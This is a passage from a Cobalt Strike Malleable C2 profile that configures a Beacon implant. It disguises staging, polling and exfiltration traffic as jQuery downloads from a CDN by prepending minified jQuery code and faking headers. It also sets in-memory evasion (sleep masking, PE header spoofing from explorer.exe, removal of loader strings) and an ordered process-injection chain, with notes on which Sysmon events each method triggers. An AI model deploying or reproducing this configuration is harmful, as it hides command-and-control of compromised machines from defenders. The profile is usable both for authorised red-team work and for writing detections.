Be aware of HTTP proxy's rewriting your request per RFC2616 Section 14.23 232 | ## - https://blog.cobaltstrike.com/2017/02/06/high-reputation-redirectors-and-domain-fronting/ 233 | ## - Note: Data transform language not supported in http stageing (mask, base64, base64url, etc) 234 | 235 | #set host_stage "false"; # Do not use staging. Must use stagles payloads 236 | set host_stage "true"; # Host payload for staging over HTTP, HTTPS, or DNS. Required by stagers.set 237 | 238 | http-stager { 239 | set uri_x86 "/ajax/libs/jquery/3.3.1/jquery.slim.min.js"; 240 | set uri_x64 "/ajax/libs/jquery/3.3.0/jquery.slim.min.js"; 241 | 242 | server { 243 | header "Server" "NetDNA-cache/2.2"; 244 | header "Cache-Control" "max-age=0, no-cache"; 245 | header "Pragma" "no-cache"; 246 | header "Connection" "keep-alive"; 247 | header "Content-Type" "application/javascript; charset=utf-8"; 248 | output { 249 | ## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values) 250 | # 2nd Line 251 | prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new 
w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return 
e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"; 255 | print; 256 | } 257 | } 258 | 259 | client { 260 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 261 | header "Accept-Language" "en-US,en;q=0.5"; 262 | #header "Host" "code.bootcdn.net"; 263 | header "Referer" "http://code.bootcdn.net/"; 264 | header "Accept-Encoding" "gzip, deflate"; 265 | } 266 | } 267 | 268 | ################################################ 269 | ## Memory Indicators 270 | ################################################ 271 | ## Description: 272 | ## The stage block in Malleable C2 profiles controls how Beacon is loaded into memory and edit the content of the Beacon DLL. 273 | ## Values: 274 | ## checksum 0 The CheckSum value in Beacon's PE header 275 | ## cleanup false Ask Beacon to attempt to free memory associated with the Reflective DLL package that initialized it. 276 | ## compile_time 14 July 2009 8:14:00 The build time in Beacon's PE header 277 | ## entry_point 92145 The EntryPoint value in Beacon's PE header 278 | ## image_size_x64 512000 SizeOfImage value in x64 Beacon's PE header 279 | ## image_size_x86 512000 SizeOfImage value in x86 Beacon's PE header 280 | ## module_x64 xpsservices.dll Same as module_x86; affects x64 loader 281 | ## module_x86 xpsservices.dll Ask the x86 ReflectiveLoader to load the specified library and overwrite its space instead of allocating memory with VirtualAlloc. 282 | ## name beacon.x64.dll The Exported name of the Beacon DLL 283 | ## obfuscate false Obfuscate the Reflective DLL's import table, overwrite unused header content, and ask ReflectiveLoader to copy Beacon to new memory without its DLL headers. 
284 | ## rich_header N/A Meta-information inserted by the compiler 285 | ## sleep_mask false Obfuscate Beacon (HTTP, SMB, TCP Beacons), in-memory, prior to sleeping (HTTP) or waiting for a new connection\data (SMB\TCP) 286 | ## stomppe true Ask ReflectiveLoader to stomp MZ, PE, and e_lfanew values after it loads Beacon payload 287 | ## userwx false Ask ReflectiveLoader to use or avoid RWX permissions for Beacon DLL in memory 288 | ## Guidelines: 289 | ## - Modify the indicators to minimize in memory indicators 290 | # - Refer to 291 | ## https://blog.cobaltstrike.com/2018/02/08/in-memory-evasion/ 292 | ## https://www.youtube.com/playlist?list=PL9HO6M_MU2nc5Q31qd2CwpZ8J4KFMhgnK 293 | ## https://www.youtube.com/watch?v=AV4XjxYe4GM (Obfuscate and Sleep) 294 | stage { 295 | set userwx "false"; 296 | set stomppe "true"; 297 | set obfuscate "true"; 298 | set name "srv.dll"; 299 | set cleanup "true"; 300 | # CS 3.12 Addition "Obfuscate and Sleep" 301 | set sleep_mask "true"; 302 | 303 | # Values captured using peclone agaist a Windows 10 version of explorer.exe 304 | set checksum "0"; 305 | set compile_time "11 Nov 2016 04:08:32"; 306 | set entry_point "650688"; 307 | set image_size_x86 "4661248"; 308 | set image_size_x64 "4661248"; 309 | set rich_header "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 310 | 311 | ## WARNING: Module stomping 312 | # Cobalt Strike 3.11 also adds module stomping to Beacon's Reflective Loader. When enabled, Beacon's loader will shun VirtualAlloc and instead load a DLL into the current process and overwrite its memory. 
313 | # Set module_x86 to a favorite x86 DLL to module stomp with the x86 Beacon. The module_x64 option enables this for the x64 Beacon. 314 | # While this is a powerful feature, caveats apply! If the library you load is not large enough to host Beacon, you will crash Beacon's process. If the current process loads the same library later (for whatever reason), you will crash Beacon's process. Choose carefully. 315 | # By default, Beacon's loader allocates memory with VirtualAlloc. Module stomping is an alternative to this. Set module_x86 to a DLL that is about twice as large as the Beacon payload itself. Beacon's x86 loader will load the specified DLL, find its location in memory, and overwrite it. This is a way to situate Beacon in memory that Windows associates with a file on disk. It's important that the DLL you choose is not needed by the applications you intend to reside in. The module_x64 option is the same story, but it affects the x64 Beacon. 316 | # Details can be found in the In-memory Evasion video series. https://youtu.be/uWVH9l2GMw4 317 | 318 | # set module_x64 "netshell.dll"; 319 | # set module_x86 "netshell.dll"; 320 | 321 | # The transform-x86 and transform-x64 blocks pad and transform Beacon's Reflective DLL stage. These blocks support three commands: prepend, append, and strrep. 
322 | transform-x86 { # transform the x86 rDLL stage 323 | prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops 324 | strrep "ReflectiveLoader" "execute"; # Change this text 325 | strrep "This program cannot be run in DOS mode" ""; # Remove this text 326 | strrep "beacon.dll" ""; # Remove this text 327 | } 328 | transform-x64 { # transform the x64 rDLL stage 329 | prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops 330 | strrep "ReflectiveLoader" "execute"; # Change this text in the Beacon DLL 331 | strrep "beacon.x64.dll" ""; # Remove this text in the Beacon DLL 332 | } 333 | 334 | stringw "jQuery"; # Add this string to the DLL 335 | } 336 | 337 | ################################################ 338 | ## Process Injection 339 | ################################################ 340 | ## Description: 341 | ## The process-inject block in Malleable C2 profiles shapes injected content and controls process injection behavior. 342 | ## Values: 343 | ## allocator VirtualAllocEx The preferred method to allocate memory in the remote process. Specify VirtualAllocEx or NtMapViewOfSection. The NtMapViewOfSection option is for same-architecture injection only. VirtualAllocEx is always used for cross-arch memory allocations. 344 | ## min_alloc 4096 Minimum amount of memory to request for injected content. 345 | ## startrwx false Use RWX as initial permissions for injected content. Alternative is RW. 346 | ## userwx false Use RWX as final permissions for injected content. Alternative is RX. 
347 | ## 348 | ## Use the transform-x86\x64 to pad content injected by Beacon 349 | ## Use the execute block to control use of Beacon's process injection techniques 350 | ## Guidelines: 351 | ## - Modify the indicators to minimize in memory indicators 352 | # - Refer to 353 | ## https://www.cobaltstrike.com/help-malleable-c2#processinject 354 | ## https://blog.cobaltstrike.com/2019/08/21/cobalt-strikes-process-injection-the-details/ 355 | 356 | process-inject { 357 | 358 | # set a remote memory allocation technique: VirtualAllocEx|NtMapViewOfSection 359 | set allocator "NtMapViewOfSection"; 360 | 361 | # Minimum memory allocation size when injecting content 362 | set min_alloc "17500"; 363 | 364 | # Set memory permissions as initial=RWX, final=RX 365 | set startrwx "false"; 366 | set userwx "false"; 367 | 368 | # Transform injected content to avoid signature detection of first few bytes. Only supports prepend and append. 369 | transform-x86 { 370 | prepend "\x90\x90"; 371 | #append "\x90\x90"; 372 | } 373 | 374 | transform-x64 { 375 | prepend "\x90\x90"; 376 | #append "\x90\x90"; 377 | } 378 | 379 | ## The execute block controls the methods Beacon will use when it needs to inject code into a process. Beacon examines each option in the execute block, determines if the option is usable for the current context, tries the method when it is usable, and moves on to the next option if code execution did not happen. The execute options include: 380 | # 381 | # Name x86->x64 x64-x86 Notes 382 | ######################################################################### 383 | # CreateThread Current Process only 384 | # CreateRemoteThread Yes No cross-session 385 | # NtQueueApcThread 386 | # NtQueueApcThread-s This is the "Early Bird" injection technique. Suspended processes (e.g., post-ex jobs) only. 387 | # RtlCreateUserThread Yes Yes Risky on XP-era targets; uses RWX shellcode for x86->x64 injection. 388 | # SetThreadContext Yes Suspended processes (e.g. 
post-ex jobs only) 389 | execute { 390 | 391 | # The order is important! Each step will be attempted (if applicable) until successful 392 | ## self-injection 393 | CreateThread "ntdll!RtlUserThreadStart+0x42"; 394 | CreateThread; 395 | 396 | ## Injection via suspended processes (SetThreadContext|NtQueueApcThread-s) 397 | # OPSEC - when you use SetThreadContext; your thread will have a start address that reflects the original execution entry point of the temporary process. 398 | # SetThreadContext; 399 | NtQueueApcThread-s; 400 | 401 | ## Injection into existing processes 402 | # OPSEC Uses RWX stub - Detected by Get-InjectedThread. Less detected by some defensive products. 403 | #NtQueueApcThread; 404 | 405 | # CreateRemoteThread - Vanilla cross process injection technique. Doesn't cross session boundaries 406 | # OPSEC - fires Sysmon Event 8 407 | CreateRemoteThread; 408 | 409 | # RtlCreateUserThread - Supports all architecture dependent corner cases (e.g., 32bit -> 64bit injection) AND injection across session boundaries 410 | # OPSEC - fires Sysmon Event 8. Uses Meterpreter implementation and RWX stub - Detected by Get-InjectedThread 411 | RtlCreateUserThread; 412 | } 413 | } 414 | 415 | 416 | ################################################ 417 | ## HTTP Headers 418 | ################################################ 419 | ## Description: 420 | ## The http-config block has influence over all HTTP responses served by Cobalt Strike’s web server. Here, you may specify additional HTTP headers and the HTTP header order. 421 | ## Values: 422 | ## set headers "Comma separated list of headers" The set headers option specifies the order these HTTP headers are delivered in an HTTP response. Any headers not in this list are added to the end. 423 | ## header "headername" "header value" The header keyword adds a header value to each of Cobalt Strike's HTTP responses. If the header value is already defined in a response, this value is ignored. 
424 | ## set trust_x_forwarded_for "true" Adds this header to determine remote address of a request. 425 | ## Guidelines: 426 | ## - Use this section in addition to the "server" section in http-get and http-post to further define the HTTP headers 427 | 428 | http-config { 429 | set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type"; 430 | header "Server" "Apache"; 431 | header "Keep-Alive" "timeout=10, max=100"; 432 | header "Connection" "Keep-Alive"; 433 | # Use this option if your teamserver is behind a redirector 434 | set trust_x_forwarded_for "true"; 435 | } 436 | 437 | ################################################ 438 | ## HTTP GET 439 | ################################################ 440 | ## Description: 441 | ## GET is used to poll teamserver for tasks 442 | ## Defaults: 443 | ## uri "/activity" 444 | ## Headers (Sample) 445 | ## Accept: */* 446 | ## Cookie: CN7uVizbjdUdzNShKoHQc1HdhBsB0XMCbWJGIRF27eYLDqc9Tnb220an8ZgFcFMXLARTWEGgsvWsAYe+bsf67HyISXgvTUpVJRSZeRYkhOTgr31/5xHiittfuu1QwcKdXopIE+yP8QmpyRq3DgsRB45PFEGcidrQn3/aK0MnXoM= 447 | ## User-Agent Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1) 448 | ## Guidelines: 449 | ## - Add customized HTTP headers to the HTTP traffic of your campaign 450 | ## - Analyze sample HTTP traffic to use as a reference 451 | ## - Multiple URIs can be added. Beacon will randomly pick from these. 
452 | ## - Use spaces as a URI seperator 453 | http-get { 454 | 455 | set uri "/ajax/libs/jquery/3.3.1/jquery.min.js"; 456 | set verb "GET"; 457 | 458 | client { 459 | 460 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 461 | #header "Host" "code.bootcdn.net"; 462 | header "Referer" "http://code.bootcdn.net/"; 463 | header "Accept-Encoding" "gzip, deflate"; 464 | 465 | metadata { 466 | base64url; 467 | prepend "__cfduid="; 468 | header "Cookie"; 469 | } 470 | } 471 | 472 | server { 473 | 474 | header "Server" "NetDNA-cache/2.2"; 475 | header "Cache-Control" "max-age=0, no-cache"; 476 | header "Pragma" "no-cache"; 477 | header "Connection" "keep-alive"; 478 | header "Content-Type" "application/javascript; charset=utf-8"; 479 | 480 | output { 481 | mask; 482 | base64url; 483 | ## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values) 484 | # 2nd Line 485 | prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new 
w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return 
e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"; 489 | print; 490 | } 491 | } 492 | } 493 | 494 | ################################################ 495 | ## HTTP POST 496 | ################################################ 497 | ## Description: 498 | ## POST is used to send output to the teamserver 499 | ## Can use HTTP GET or POST to send data 500 | ## Note on using GET: Beacon will automatically chunk its responses (and use multiple requests) to fit the constraints of an HTTP GET-only channel. 501 | ## Defaults: 502 | ## uri "/activity" 503 | ## Headers (Sample) 504 | ## Accept: */* 505 | ## Cookie: CN7uVizbjdUdzNShKoHQc1HdhBsB0XMCbWJGIRF27eYLDqc9Tnb220an8ZgFcFMXLARTWEGgsvWsAYe+bsf67HyISXgvTUpVJRSZeRYkhOTgr31/5xHiittfuu1QwcKdXopIE+yP8QmpyRq3DgsRB45PFEGcidrQn3/aK0MnXoM= 506 | ## User-Agent Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1) 507 | ## Guidelines: 508 | ## - Decide if you want to use HTTP GET or HTTP POST requests for this section 509 | ## - Add customize HTTP headers to the HTTP traffic of your campaign 510 | ## - Analyze sample HTTP traffic to use as a reference 511 | ## Use HTTP POST for http-post section 512 | ## Uncomment this Section to activate 513 | http-post { 514 | 515 | set uri "/ajax/libs/jquery/3.3.0/jquery.min.js"; 516 | set verb "POST"; 517 | 518 | client { 519 | 520 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 521 | #header "Host" "code.bootcdn.net"; 522 | header "Referer" "http://code.bootcdn.net/"; 523 | header "Accept-Encoding" "gzip, deflate"; 524 | 525 | id { 526 | mask; 527 | base64url; 528 | parameter "__cfduid"; 529 | } 530 | 531 | output { 532 | mask; 533 | base64url; 534 | print; 535 | } 536 | } 537 | 538 | server { 539 | 540 | header "Server" "NetDNA-cache/2.2"; 541 | header "Cache-Control" "max-age=0, no-cache"; 542 | header "Pragma" "no-cache"; 543 | header "Connection" "keep-alive"; 544 | header "Content-Type" "application/javascript; 
charset=utf-8"; 545 | 546 | output { 547 | mask; 548 | base64url; 549 | ## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values) 550 | # 2nd Line 551 | prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return 
e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"; 555 | print; 556 | } 557 | } 558 | } 559 | 560 | ## Use HTTP GET for http-post section 561 | ## Uncomment this Section to activate 562 | # http-post { 563 | 564 | # set uri "/ajax/libs/jquery/3.3.0/jquery.min.js"; 565 | # set verb "GET"; 566 | 567 | # client { 568 | 569 | # header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 570 | # #header "Host" "code.bootcdn.net"; 571 | # header "Referer" "http://code.bootcdn.net/"; 572 | # header "Accept-Encoding" "gzip, deflate"; 573 | 574 | # id { 575 | # mask; 576 | # base64url; 577 | # parameter "__cfduid"; 578 | # } 579 | 580 | # output { 581 | # mask; 582 | # base64url; 583 | # parameter "__tg"; 584 | # } 585 | # } 586 | 587 | # server { 588 | 589 | # header "Server" "NetDNA-cache/2.2"; 590 | # 
header "Cache-Control" "max-age=0, no-cache"; 591 | # header "Pragma" "no-cache"; 592 | # header "Connection" "keep-alive"; 593 | # header "Content-Type" "application/javascript; charset=utf-8"; 594 | 595 | # output { 596 | # mask; 597 | # base64url; 598 | # ## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values) 599 | # # 2nd Line 600 | # prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var 
t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"; 604 | # print; 605 | # } 606 | # } 607 | # } 608 | 609 | ## CS 4.0 Profile Variants 610 | ## Variants are selectable when configuring an HTTP or HTTPS Beacon listener. Variants allow each HTTP or HTTPS Beacon listener tied to a single team server to have network IOCs that differ from each other. 611 | ## You may add profile "variants" by specifying additional http-get, http-post, http-stager, and https-certifcate blocks with the following syntax: 612 | ## [block name] "variant name" { ... }. 
